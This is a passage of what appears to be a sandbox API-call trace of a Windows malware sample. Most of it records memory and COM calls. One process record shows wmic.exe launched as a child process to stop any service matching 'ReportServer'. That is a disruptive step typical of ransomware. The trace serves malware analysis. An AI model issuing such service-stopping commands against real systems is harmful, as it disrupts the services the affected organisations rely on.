free (_Block=0x408640) [0259.157] free (_Block=0x40cb60) [0259.157] free (_Block=0x40cb80) [0259.157] free (_Block=0x406ee0) [0259.157] free (_Block=0x40d5d0) [0259.157] free (_Block=0x40cba0) [0259.157] free (_Block=0x40cc00) [0259.157] free (_Block=0x40d550) [0259.157] free (_Block=0x40d4d0) [0259.157] free (_Block=0x40cbe0) [0259.157] free (_Block=0x40cbc0) [0259.157] free (_Block=0x40cc20) [0259.157] free (_Block=0x40d470) [0259.157] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0259.157] free (_Block=0x40cec0) [0259.157] free (_Block=0x40cb00) [0259.157] free (_Block=0x40cf90) [0259.157] free (_Block=0x40cb40) [0259.158] free (_Block=0x40d010) [0259.158] free (_Block=0x40cb20) [0259.158] free (_Block=0x40cae0) [0259.158] free (_Block=0x4069a0) [0259.158] free (_Block=0x4069f0) [0259.158] free (_Block=0x406a40) [0259.158] free (_Block=0x40cc40) [0259.158] free (_Block=0x406b00) [0259.158] free (_Block=0x406ec0) [0259.158] free (_Block=0x408040) [0259.158] free (_Block=0x406ea0) [0259.158] free (_Block=0x408000) [0259.158] free (_Block=0x406e40) [0259.158] free (_Block=0x406e60) [0259.158] free (_Block=0x406d20) [0259.158] free (_Block=0x406d40) [0259.158] free (_Block=0x406cc0) [0259.158] free (_Block=0x406ce0) [0259.158] free (_Block=0x406d80) [0259.158] free (_Block=0x406da0) [0259.158] free (_Block=0x406de0) [0259.158] free (_Block=0x406e00) [0259.158] free (_Block=0x406c00) [0259.159] free (_Block=0x406c20) [0259.159] free (_Block=0x406ba0) [0259.159] free (_Block=0x406bc0) [0259.159] free (_Block=0x406c60) [0259.159] free (_Block=0x406c80) [0259.159] free (_Block=0x406b40) [0259.159] free (_Block=0x406b60) [0259.159] free (_Block=0x406ab0) [0259.159] free (_Block=0x407f90) [0259.159] free (_Block=0x406f70) [0259.159] WbemLocator:IUnknown:Release (This=0x1fd1390) returned 0x2 [0259.159] WbemLocator:IUnknown:Release (This=0x1fe3a98) returned 0x0 [0259.159] WbemLocator:IUnknown:Release (This=0x1fd1390) returned 0x1 [0259.159] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0259.160] WbemLocator:IUnknown:Release (This=0x1fd1390) returned 0x0 [0259.160] free (_Block=0x40c9e0) [0259.160] free (_Block=0x40ca00) [0259.160] free (_Block=0x408540) [0259.160] free (_Block=0x40ca20) [0259.160] free (_Block=0x40ca40) [0259.160] free (_Block=0x408580) [0259.160] free (_Block=0x40c860) [0259.160] free (_Block=0x40c880) [0259.160] free (_Block=0x4083c0) [0259.160] free (_Block=0x40c8a0) [0259.160] free (_Block=0x40c8c0) [0259.160] free (_Block=0x408400) [0259.161] free (_Block=0x40c7e0) [0259.161] free (_Block=0x40c800) [0259.161] free (_Block=0x408340) [0259.161] free (_Block=0x40c820) [0259.161] free (_Block=0x40c840) [0259.161] free (_Block=0x408380) [0259.161] free (_Block=0x40c960) [0259.161] free (_Block=0x40c980) [0259.161] free (_Block=0x4084c0) [0259.161] free (_Block=0x40c9a0) [0259.161] free (_Block=0x40c9c0) [0259.161] free (_Block=0x408500) [0259.161] free (_Block=0x40c760) [0259.161] free (_Block=0x40c780) [0259.161] free (_Block=0x4082c0) [0259.161] free (_Block=0x40c7a0) [0259.161] free (_Block=0x40c7c0) [0259.161] free (_Block=0x408300) [0259.161] free (_Block=0x40c8e0) [0259.162] free (_Block=0x40c900) [0259.162] free (_Block=0x408440) [0259.162] free (_Block=0x40c920) [0259.162] free (_Block=0x40c940) [0259.162] free (_Block=0x408480) [0259.162] free (_Block=0x40c6a0) [0259.162] free (_Block=0x40c6c0) [0259.162] free (_Block=0x408200) [0259.162] free (_Block=0x40c560) [0259.162] free (_Block=0x40c580) [0259.162] free (_Block=0x4080c0) [0259.162] free (_Block=0x406f30) [0259.162] free (_Block=0x406f50) [0259.162] free (_Block=0x408080) [0259.162] free (_Block=0x40c5e0) [0259.162] free (_Block=0x40c600) [0259.162] free (_Block=0x408140) [0259.162] free (_Block=0x40c6e0) [0259.162] free (_Block=0x40c700) [0259.162] free (_Block=0x408240) [0259.162] free (_Block=0x40c5a0) [0259.163] free (_Block=0x40c5c0) [0259.163] free (_Block=0x408100) [0259.163] free (_Block=0x40c620) [0259.163] free (_Block=0x40c640) [0259.163] free (_Block=0x408180) [0259.163] free (_Block=0x40c660) [0259.163] free (_Block=0x40c680) [0259.163] free (_Block=0x4081c0) [0259.163] free (_Block=0x40c720) [0259.163] free (_Block=0x40c740) [0259.163] free (_Block=0x408280) [0259.163] CoUninitialize () [0259.203] exit (_Code=0) [0259.203] free (_Block=0x40cd30) [0259.203] free (_Block=0x407f50) [0259.203] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.203] free (_Block=0x407020) [0259.203] free (_Block=0x406b20) [0259.203] free (_Block=0x407f10) [0259.203] free (_Block=0x407ed0) [0259.203] free (_Block=0x407e80) [0259.203] free (_Block=0x407e40) [0259.203] free (_Block=0x405ac0) [0259.203] free (_Block=0x407dc0) [0259.204] free (_Block=0x405a80) [0259.204] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.204] free (_Block=0x4085c0) Thread: id = 246 os_tid = 0xbe0 Thread: id = 247 os_tid = 0x74c Thread: id = 248 os_tid = 0xbac Thread: id = 249 os_tid = 0xb9c Thread: id = 250 os_tid = 0x890 Process: id = "31" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x25f7a000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 252 os_tid = 0x330 [0259.438] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfc90 | out: lpSystemTimeAsFileTime=0x1cfc90*(dwLowDateTime=0xaff743e0, dwHighDateTime=0x1d61d49)) [0259.438] GetCurrentProcessId () returned 0x69c [0259.439] GetCurrentThreadId () returned 0x330 [0259.439] GetTickCount () returned 0x116a68c [0259.439] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfc98 | out: lpPerformanceCount=0x1cfc98*=37961219776) returned 1 [0259.442] GetModuleHandleW (lpModuleName=0x0) returned 0xff350000 [0259.442] __set_app_type (_Type=0x1) [0259.442] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff39ced0) returned 0x0 [0259.443] __wgetmainargs (in: _Argc=0xff3c2380, _Argv=0xff3c2390, _Env=0xff3c2388, _DoWildCard=0, _StartInfo=0xff3c239c | out: _Argc=0xff3c2380, _Argv=0xff3c2390, _Env=0xff3c2388) returned 0 [0259.443] ??0CHString@@QEAA@XZ () returned 0xff3c2ab0 [0259.443] malloc (_Size=0x30) returned 0x3e5a80 [0259.443] malloc (_Size=0x70) returned 0x3e7dc0 [0259.444] malloc (_Size=0x50) returned 0x3e5ac0 [0259.444] malloc (_Size=0x30) returned 0x3e7e40 [0259.444] malloc (_Size=0x48) returned 0x3e7e80 [0259.444] malloc (_Size=0x30) returned 0x3e7ed0 [0259.444] malloc (_Size=0x30) returned 0x3e7f10 [0259.444] ??0CHString@@QEAA@XZ () returned 0xff3c2f58 [0259.444] malloc (_Size=0x30) returned 0x3e7f50 [0259.444] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0259.444] SetConsoleCtrlHandler (HandlerRoutine=0xff395724, Add=1) returned 1 [0259.444] _onexit (_Func=0xff3af378) returned 0xff3af378 [0259.444] _onexit (_Func=0xff3af490) returned 0xff3af490 [0259.444] _onexit (_Func=0xff3af4d0) returned 0xff3af4d0 [0259.445] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0259.445] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0259.449] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0259.462] CoCreateInstance (in: rclsid=0xff3573a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff357370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff3c2940 | out: ppv=0xff3c2940*=0x1e11390) returned 0x0 [0259.474] GetCurrentProcess () returned 0xffffffffffffffff [0259.474] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cfa60 | out: TokenHandle=0x1cfa60*=0xf4) returned 1 [0259.474] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfa58 | out: TokenInformation=0x0, ReturnLength=0x1cfa58) returned 0 [0259.474] malloc (_Size=0x118) returned 0x3e69a0 [0259.474] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3e69a0, TokenInformationLength=0x118, ReturnLength=0x1cfa58 | out: TokenInformation=0x3e69a0, ReturnLength=0x1cfa58) returned 1 [0259.474] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3e69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=489972624, Attributes=0xf565), (Luid.LowPart=0x0, Luid.HighPart=4095888, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0259.474] free (_Block=0x3e69a0) [0259.474] CloseHandle (hObject=0xf4) returned 1 [0259.474] malloc (_Size=0x40) returned 0x3e69a0 [0259.474] malloc (_Size=0x40) returned 0x3e69f0 [0259.475] malloc (_Size=0x40) returned 0x3e6a40 [0259.475] malloc (_Size=0x20a) returned 0x3e6a90 [0259.475] GetSystemDirectoryW (in: lpBuffer=0x3e6a90, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0259.475] free (_Block=0x3e6a90) [0259.475] malloc (_Size=0x18) returned 0x3e7f90 [0259.475] malloc (_Size=0x18) returned 0x3e7fb0 [0259.475] malloc (_Size=0x18) returned 0x3e6a90 [0259.475] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0259.475] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0259.475] free (_Block=0x3e7f90) [0259.475] free (_Block=0x3e7fb0) [0259.475] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0259.475] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0259.476] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0259.476] FreeLibrary (hLibModule=0x77940000) returned 1 [0259.476] free (_Block=0x3e6a90) [0259.476] _vsnwprintf (in: _Buffer=0x3e6a40, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf688 | out: _Buffer="ms_409") returned 6 [0259.476] malloc (_Size=0x20) returned 0x3e7f90 [0259.477] GetComputerNameW (in: lpBuffer=0x3e7f90, nSize=0x1cfa60 | out: lpBuffer="XDUWTFONO", nSize=0x1cfa60) returned 1 [0259.477] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.477] malloc (_Size=0x14) returned 0x3e6a90 [0259.477] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.477] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cfa58 | out: lpNameBuffer=0x0, nSize=0x1cfa58) returned 0x7fffffde000 [0259.478] GetLastError () returned 0xea [0259.478] malloc (_Size=0x40) returned 0x3e6ab0 [0259.478] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3e6ab0, nSize=0x1cfa58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cfa58) returned 0x1 [0259.479] lstrlenW (lpString="") returned 0 [0259.479] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0259.481] lstrlenW (lpString=".") returned 1 [0259.481] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0259.481] lstrlenW (lpString="LOCALHOST") returned 9 [0259.481] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0259.481] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.481] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0259.481] free (_Block=0x3e6a90) [0259.481] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.482] malloc (_Size=0x14) returned 0x3e6a90 [0259.482] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.482] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.482] malloc (_Size=0x14) returned 0x3e6b00 [0259.482] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.482] malloc (_Size=0x8) returned 0x3e6b20 [0259.482] malloc (_Size=0x18) returned 0x3e6b40 [0259.482] malloc (_Size=0x30) returned 0x3e6b60 [0259.482] malloc (_Size=0x18) returned 0x3e6ba0 [0259.482] SysStringLen (param_1="IDENTIFY") returned 0x8 [0259.482] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0259.482] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0259.482] SysStringLen (param_1="IDENTIFY") returned 0x8 [0259.482] malloc (_Size=0x30) returned 0x3e6bc0 [0259.482] malloc (_Size=0x18) returned 0x3e6c00 [0259.482] SysStringLen (param_1="IMPERSONATE") returned 0xb [0259.482] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0259.482] SysStringLen (param_1="IMPERSONATE") returned 0xb [0259.482] SysStringLen (param_1="IDENTIFY") returned 0x8 [0259.482] SysStringLen (param_1="IDENTIFY") returned 0x8 [0259.482] SysStringLen (param_1="IMPERSONATE") returned 0xb [0259.482] malloc (_Size=0x30) returned 0x3e6c20 [0259.482] malloc (_Size=0x18) returned 0x3e6c60 [0259.482] SysStringLen (param_1="DELEGATE") returned 0x8 [0259.482] SysStringLen (param_1="IDENTIFY") returned 0x8 [0259.483] SysStringLen (param_1="DELEGATE") returned 0x8 [0259.483] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0259.483] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0259.483] SysStringLen (param_1="DELEGATE") returned 0x8 [0259.483] malloc (_Size=0x30) returned 0x3e6c80 [0259.483] malloc (_Size=0x18) returned 0x3e6cc0 [0259.483] malloc (_Size=0x30) returned 0x3e6ce0 [0259.483] malloc (_Size=0x18) returned 0x3e6d20 [0259.483] SysStringLen (param_1="NONE") returned 0x4 [0259.483] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.483] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.483] SysStringLen (param_1="NONE") returned 0x4 [0259.483] malloc (_Size=0x30) returned 0x3e6d40 [0259.483] malloc (_Size=0x18) returned 0x3e6d80 [0259.483] SysStringLen (param_1="CONNECT") returned 0x7 [0259.483] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.483] malloc (_Size=0x30) returned 0x3e6da0 [0259.483] malloc (_Size=0x18) returned 0x3e6de0 [0259.483] SysStringLen (param_1="CALL") returned 0x4 [0259.483] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.483] SysStringLen (param_1="CALL") returned 0x4 [0259.483] SysStringLen (param_1="CONNECT") returned 0x7 [0259.483] malloc (_Size=0x30) returned 0x3e6e00 [0259.483] malloc (_Size=0x18) returned 0x3e6e40 [0259.483] SysStringLen (param_1="PKT") returned 0x3 [0259.483] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.483] SysStringLen (param_1="PKT") returned 0x3 [0259.484] SysStringLen (param_1="NONE") returned 0x4 [0259.484] SysStringLen (param_1="NONE") returned 0x4 [0259.484] SysStringLen (param_1="PKT") returned 0x3 [0259.484] malloc (_Size=0x30) returned 0x3e6e60 [0259.484] malloc (_Size=0x18) returned 0x3e6ea0 [0259.484] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0259.484] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.484] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0259.484] SysStringLen (param_1="NONE") returned 0x4 [0259.484] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0259.484] SysStringLen (param_1="PKT") returned 0x3 [0259.484] SysStringLen (param_1="PKT") returned 0x3 [0259.484] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0259.484] malloc (_Size=0x30) returned 0x3e8000 [0259.485] malloc (_Size=0x18) returned 0x3e6ec0 [0259.485] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0259.485] SysStringLen (param_1="DEFAULT") returned 0x7 [0259.485] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0259.485] SysStringLen (param_1="PKT") returned 0x3 [0259.485] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0259.485] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0259.485] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0259.485] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0259.485] malloc (_Size=0x30) returned 0x3e8040 [0259.485] malloc (_Size=0x40) returned 0x3e6ee0 [0259.485] malloc (_Size=0x20a) returned 0x3e6f30 [0259.485] GetSystemDirectoryW (in: lpBuffer=0x3e6f30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0259.485] free (_Block=0x3e6f30) [0259.485] malloc (_Size=0x18) returned 0x3e6f30 [0259.485] malloc (_Size=0x18) returned 0x3e6f50 [0259.485] malloc (_Size=0x18) returned 0x3e6f70 [0259.485] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0259.485] SysStringLen (param_1="\\wbem\\") returned 0x6 [0259.486] free (_Block=0x3e6f30) [0259.486] free (_Block=0x3e6f50) [0259.486] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0259.486] free (_Block=0x3e6f70) [0259.486] malloc (_Size=0x18) returned 0x3e6f30 [0259.486] malloc (_Size=0x18) returned 0x3e6f50 [0259.486] malloc (_Size=0x18) returned 0x3e6f70 [0259.486] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0259.486] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0259.486] free (_Block=0x3e6f30) [0259.486] free (_Block=0x3e6f50) [0259.486] GetCurrentThreadId () returned 0x330 [0259.486] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf360 | out: phkResult=0x1cf360*=0xf8) returned 0x0 [0259.486] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf3b0, lpcbData=0x1cf350*=0x400 | out: lpType=0x0, lpData=0x1cf3b0*=0x30, lpcbData=0x1cf350*=0x4) returned 0x0 [0259.487] _wcsicmp (_String1="0", _String2="1") returned -1 [0259.487] _wcsicmp (_String1="0", _String2="2") returned -2 [0259.487] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf350*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf350*=0x42) returned 0x0 [0259.487] malloc (_Size=0x86) returned 0x3e6f90 [0259.487] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3e6f90, lpcbData=0x1cf350*=0x42 | out: lpType=0x0, lpData=0x3e6f90*=0x25, lpcbData=0x1cf350*=0x42) returned 0x0 [0259.487] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0259.487] malloc (_Size=0x42) returned 0x3e7020 [0259.488] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0259.488] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf3b0, lpcbData=0x1cf350*=0x400 | out: lpType=0x0, lpData=0x1cf3b0*=0x36, lpcbData=0x1cf350*=0xc) returned 0x0 [0259.488] _wtol (_String="65536") returned 65536 [0259.489] free (_Block=0x3e6f90) [0259.489] RegCloseKey (hKey=0x0) returned 0x6 [0259.489] CoCreateInstance (in: rclsid=0xff357410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3573f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cf858 | out: ppv=0x1cf858*=0x23271d0) returned 0x0 [0259.511] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x23271d0, xmlSource=0x1cf9a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x3e6f30), isSuccessful=0x1cfa10 | out: isSuccessful=0x1cfa10*=0xffff) returned 0x0 [0259.668] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x23271d0, DOMElement=0x1cf850 | out: DOMElement=0x1cf850*=0x232bc50) returned 0x0 [0259.668] malloc (_Size=0x18) returned 0x3e6f30 [0259.668] IXMLDOMElement:getElementsByTagName (in: This=0x232bc50, tagName="XSLFORMAT", resultList=0x1cf860 | out: resultList=0x1cf860*=0x2329cc0) returned 0x0 [0259.670] free (_Block=0x3e6f30) [0259.670] IXMLDOMNodeList:get_length (in: This=0x2329cc0, listLength=0x1cfa28 | out: listLength=0x1cfa28*=21) returned 0x0 [0259.670] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=0, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.670] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="texttable.xsl") returned 0x0 [0259.670] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.671] malloc (_Size=0x18) returned 0x3e6f30 [0259.671] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.671] free (_Block=0x3e6f30) [0259.671] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0259.671] malloc (_Size=0x18) returned 0x3e6f30 [0259.671] malloc (_Size=0x18) returned 0x3e6f50 [0259.671] malloc (_Size=0x30) returned 0x3e8080 [0259.671] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.671] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.671] IUnknown:Release (This=0x232a280) returned 0x0 [0259.671] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=1, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.671] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="textvaluelist.xsl") returned 0x0 [0259.671] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.672] malloc (_Size=0x18) returned 0x3e6f90 [0259.672] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.672] free (_Block=0x3e6f90) [0259.672] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0259.672] malloc (_Size=0x18) returned 0x3ec560 [0259.672] malloc (_Size=0x18) returned 0x3ec580 [0259.672] SysStringLen (param_1="VALUE") returned 0x5 [0259.672] SysStringLen (param_1="TABLE") returned 0x5 [0259.672] SysStringLen (param_1="TABLE") returned 0x5 [0259.672] SysStringLen (param_1="VALUE") returned 0x5 [0259.672] malloc (_Size=0x30) returned 0x3e80c0 [0259.672] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.672] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.672] IUnknown:Release (This=0x232a280) returned 0x0 [0259.672] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=2, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.672] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="textvaluelist.xsl") returned 0x0 [0259.672] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: attributeMap=0x1cf838*=0x23278d0) returned 0x0 [0259.673] malloc (_Size=0x18) returned 0x3ec5a0 [0259.673] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23278d0, name="KEYWORD", namedItem=0x1cf848 | out: namedItem=0x1cf848*=0x232a280) returned 0x0 [0259.673] free (_Block=0x3ec5a0) [0259.673] IXMLDOMNode:get_nodeValue (in: This=0x232a280, value=0x1cf880 | out: value=0x1cf880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0259.673] malloc (_Size=0x18) returned 0x3ec5a0 [0259.673] malloc (_Size=0x18) returned 0x3ec5c0 [0259.673] SysStringLen (param_1="LIST") returned 0x4 [0259.673] SysStringLen (param_1="TABLE") returned 0x5 [0259.673] malloc (_Size=0x30) returned 0x3e8100 [0259.673] IUnknown:Release (This=0x232bd50) returned 0x0 [0259.673] IUnknown:Release (This=0x23278d0) returned 0x0 [0259.673] IUnknown:Release (This=0x232a280) returned 0x0 [0259.673] IXMLDOMNodeList:get_item (in: This=0x2329cc0, index=3, listItem=0x1cf830 | out: listItem=0x1cf830*=0x232bd50) returned 0x0 [0259.673] IXMLDOMNode:get_text (in: This=0x232bd50, text=0x1cf840 | out: text=0x1cf840*="rawxml.xsl") returned 0x0 [0259.673] IXMLDOMNode:get_attributes (in: This=0x232bd50, attributeMap=0x1cf838 | out: 